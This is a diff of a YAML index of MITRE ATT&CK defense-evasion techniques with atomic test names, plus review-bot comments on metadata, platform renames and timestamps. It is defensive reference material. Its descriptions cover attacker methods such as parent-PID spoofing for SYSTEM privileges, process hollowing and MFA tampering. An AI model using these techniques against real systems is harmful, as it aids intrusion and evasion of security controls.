- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -20205,6 +20272,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -20215,9 +20285,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -20227,8 +20302,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
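Review bot: most of the 35 added lines in this hunk are the same keys the earlier `@@ -20143` hunk removed from the top of the T1497.002 object, re-emitted at the bottom in a different order; the effective changes are `revoked: false`, `x_mitre_deprecated: false`, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the `/edit` suffix and new retrieval date on the Deloitte reference, and the `modified` bump. If the generator sorted keys on output, regenerations like this would diff to only the real changes. One upstream oddity to be aware of: the Deloitte reference says "Retrieved September 13, 2024" while the object's own `modified` is 2024-09-12T15:50:18.050Z, so the record was evidently touched after its `modified` value was set.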
@@ -20285,7 +20387,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -20310,7 +20412,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -20570,7 +20671,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20597,11 +20698,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20655,7 +20755,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -20691,7 +20790,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20717,8 +20816,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -20744,7 +20841,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -20766,8 +20863,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -20833,7 +20928,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests:
- name: Compiled HTML Help Local Payload
@@ -21083,7 +21177,7 @@ defense-evasion:
name: command_prompt
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -21138,7 +21232,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests:
- name: Add Network Share
@@ -21374,7 +21467,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: Disable syslog
@@ -22736,7 +22828,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -22771,8 +22863,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -22838,7 +22928,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -22864,7 +22953,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -22889,11 +22978,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -22910,7 +22998,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -22920,7 +23007,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -22929,19 +23016,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
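Review bot: dropping `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` and adding `Office Suite` and `Identity Provider` (ATT&CK's renamed platforms, hence the 2.6 to 2.7 version bump) changes what any per-platform view derived from this file contains: a consumer that still filters on the old platform names will silently lose T1078 (and T1556.006, which is changed the same way further down). Confirm in this PR that the index generator and any platform-named outputs map the new names, rather than leaving the old platform files to shrink unnoticed.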
@@ -22989,11 +23074,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -23061,18 +23147,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
@@ -23242,7 +23327,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -23264,7 +23349,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -23339,6 +23423,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -23398,7 +23483,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
@@ -23684,7 +23768,7 @@ defense-evasion:
name: command_prompt
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -23713,24 +23797,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
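Review bot: the `+ x_mitre_attack_spec_version: 3.2.0` and `+ x_mitre_modified_by_ref` lines here are additions only because the next hunk removes the identical lines from the bottom of the same object; their values do not change. The real changes in this hunk are the added contributor (Arun Seelagan, CISA), the same platform rename as T1078 above, and the 1.2 to 1.3 version bump. This is the second object in the file where the generator has reproduced an upstream key reorder, which argues again for stable key ordering on output.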
@@ -23765,9 +23851,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -23790,7 +23873,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -23808,8 +23891,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -23848,7 +23929,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -23891,8 +23972,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests:
- name: Register Portable Virtualbox
@@ -24056,6 +24135,76 @@ defense-evasion:
cleanup_command: |-
Stop-VM $VM -Force
Remove-VM $VM -Force
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
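Review bot: the new T1027.014 (Polymorphic Code) entry arrives with `atomic_tests: []` and an empty `x_mitre_detection`, which is expected for a freshly added upstream technique with no atomics yet, and it is filed under defense-evasion, matching its single `kill_chain_phases` entry. The `description` carries upstream whitespace artifacts (`polymorphic-sentinelone) \nOther` with a space before the newline, and a trailing `\n`); they are harmless to the YAML parser, but if the index is rendered to Markdown anywhere, expect a stray trailing space.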
@@ -24099,7 +24248,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -24124,8 +24273,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
@@ -24204,7 +24351,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
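Review bot: the `modified` timestamp for Network Boundary Bridging moves backwards, from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:05:44.200Z`. Every replaced timestamp in this patch has the same `14:00:00.188Z` time on the old side (T1548.004, T1218.010, T1574.009, T1218.009, VBA Stomping, T1197 all follow the pattern), which suggests those were locally generated rather than upstream values, so the backward move looks intentional. It should still be stated in the commit message, because any consumer that sorts or de-duplicates on `modified` will see these objects as older after this change.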
@@ -24223,7 +24370,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -24318,11 +24464,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -24402,11 +24547,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
